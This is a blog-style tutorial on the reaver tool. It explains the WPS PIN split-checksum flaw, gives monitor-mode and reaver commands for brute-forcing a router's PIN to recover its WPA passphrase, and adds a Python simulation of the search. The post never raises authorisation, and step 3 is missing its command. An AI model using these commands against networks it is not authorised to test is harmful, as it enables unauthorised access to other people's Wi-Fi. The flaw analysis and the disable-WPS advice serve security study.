There is a new tool to use with BackTrack called reaver, and it is a great little tool. Reaver recovers the WPA/WPA2 passphrase of a WPS-enabled router in a matter of hours; the project page quotes four to ten hours. Here is the page: http://code.google.com/p/reaver-wps/
Anyone who has ever tried to get the password of a WPA-encrypted router knows how hard it can be. You have to capture the WPA four-way handshake and then run aircrack-ng or a similar tool against it, and that only succeeds if the passphrase is weak enough to fall to a dictionary or brute-force attack. Reaver is a great addition to the existing tools.
Reaver takes advantage of a vulnerability in Wi-Fi Protected Setup, or WPS. WPS is a feature that exists on many routers, intended to make setup easy, and one of its modes uses an eight-digit PIN that is printed on or hard-coded into the device. The flaw is in how the router checks that PIN: it verifies the first four digits and the last four digits separately, and the eighth digit is only a checksum of the other seven, so an attacker needs at most 10,000 guesses for the first half and 1,000 for the second, 11,000 in total, instead of 100 million. Once reaver has the PIN it completes a normal WPS exchange and the router hands over the WPA or WPA2 passphrase itself. Reaver never attacks the WPA encryption; it goes around it through WPS and then displays the password.
Reaver runs inside BackTrack or other Linux distributions.
1. Download BackTrack and run it inside VMware, or burn it to a disc and boot from it. If you use a VM, pass the USB adapter through to the guest: VMware does not expose the host's built-in wireless card to the guest as a Wi-Fi device.
2. You will need a USB wireless adapter that is compatible with BackTrack and supports monitor mode and packet injection (see the list of BackTrack-compatible USB adapters).
3. Start Backtrack and run the following command
4. Then install reaver with the following command:
apt-get install reaver
5. We need the BSSID of the target to run reaver, so put the adapter into monitor mode with the following command (it creates the mon0 interface used below). The BSSID then shows up in a scan of mon0 with airodump-ng, or with wash, the WPS scanner that ships with reaver, which also tells you whether WPS is enabled on each network.
airmon-ng start wlan0
6. Copy the BSSID and then run the following command:
reaver -i mon0 -b <BSSID> -vv
Reaver will now run and start a brute-force attack against the router's WPS PIN. Reaver does not work with all routers, only those with WPS enabled, which is the majority of consumer routers (around 80%). Reaver also needs good signal strength or it will have problems, and some access points lock WPS for a while after a run of failed PIN attempts, which slows the attack down considerably. On the defending side the fix is to disable WPS on the router; a strong WPA passphrase does nothing against this attack.
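To make the PIN flaw concrete, here is an added example in Python (not code from this post or from reaver itself). It implements the WPS PIN checksum from the WPS specification and then runs reaver's half-by-half search against a simulated access point. The SimulatedAccessPoint class only reproduces the observable behaviour of a real WPS registrar (rejecting after M4 when the first half is wrong, after M6 when the second half is wrong, and handing over the passphrase otherwise); no Wi-Fi traffic or cryptography is involved, and the PIN 12345670 and the passphrase are constructed test values.

```python
"""
How the WPS PIN attack that reaver runs works, in simulation.
Added example, not code from the post or from reaver: the 'access point'
is a stand-in that only mimics the ACK/NACK behaviour of the real protocol,
and the PIN and passphrase used below are constructed test values.
"""
from typing import Optional


def wps_pin_checksum(body: int) -> int:
    """Checksum digit for the first seven digits of a WPS PIN.

    Digits at odd positions (1st, 3rd, 5th, 7th) are weighted 3, digits at
    even positions are weighted 1, and the checksum brings the total to a
    multiple of 10. This is the algorithm from the WPS specification.
    """
    accum = 0
    while body:
        accum += 3 * (body % 10)
        body //= 10
        accum += body % 10
        body //= 10
    return (10 - accum % 10) % 10


def wps_pin_valid(pin: int) -> bool:
    """True if the eight-digit PIN carries the right checksum digit."""
    return 0 <= pin <= 99_999_999 and wps_pin_checksum(pin // 10) == pin % 10


class SimulatedAccessPoint:
    """Stand-in for a WPS-enabled AP (constructed, not a real registrar).

    A real AP answers registration messages M4 and M6 separately: a wrong
    first half of the PIN is rejected after M4, a wrong second half after M6,
    and a correct PIN is followed by M7, which carries the WPA credentials.
    """

    def __init__(self, pin: int, passphrase: str) -> None:
        if not wps_pin_valid(pin):
            raise ValueError("PIN checksum is wrong")
        self._first = pin // 10_000
        self._second = pin % 10_000
        self._passphrase = passphrase
        self.attempts = 0  # registration runs seen: the cost reaver pays

    def attempt(self, first_half: int, second_half: int) -> str:
        """One registration run; returns 'nack_m4', 'nack_m6' or the passphrase."""
        self.attempts += 1
        if first_half != self._first:
            return "nack_m4"
        if second_half != self._second:
            return "nack_m6"
        return self._passphrase


def recover_pin(ap: SimulatedAccessPoint):
    """Brute-force the PIN half by half, the way reaver does.

    Returns (pin, passphrase, attempts). The first half costs at most 10,000
    runs; the second half at most 1,000, because only the 5th-7th digits are
    free and the 8th is fixed by the checksum.
    """
    first: Optional[int] = None
    for guess in range(10_000):
        reply = ap.attempt(guess, 0)
        if reply != "nack_m4":
            first = guess
            if reply != "nack_m6":  # second half happened to be 0000
                return guess * 10_000, reply, ap.attempts
            break
    if first is None:
        raise RuntimeError("no first half accepted; AP is not behaving like WPS")

    for middle in range(1_000):
        body = first * 1_000 + middle              # the seven free digits
        pin = body * 10 + wps_pin_checksum(body)  # eighth digit is the checksum
        reply = ap.attempt(first, pin % 10_000)
        if reply not in ("nack_m4", "nack_m6"):
            return pin, reply, ap.attempts
    raise RuntimeError("no second half accepted")


if __name__ == "__main__":
    ap = SimulatedAccessPoint(12345670, "constructed-passphrase")
    pin, psk, runs = recover_pin(ap)
    print(f"PIN {pin:08d} -> passphrase {psk!r} after {runs} runs "
          f"(worst case 11,000; naive eight-digit search 100,000,000)")
```

Running it recovers PIN 12345670 after 1,803 registration runs, and no PIN takes more than 11,000. Against a real router each run is a full EAP exchange over the air, which is where the hours go, and a router that locks WPS after a few failures stretches that further.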
For more information, see the reaver wiki: http://code.google.com/p/reaver-wps/w/list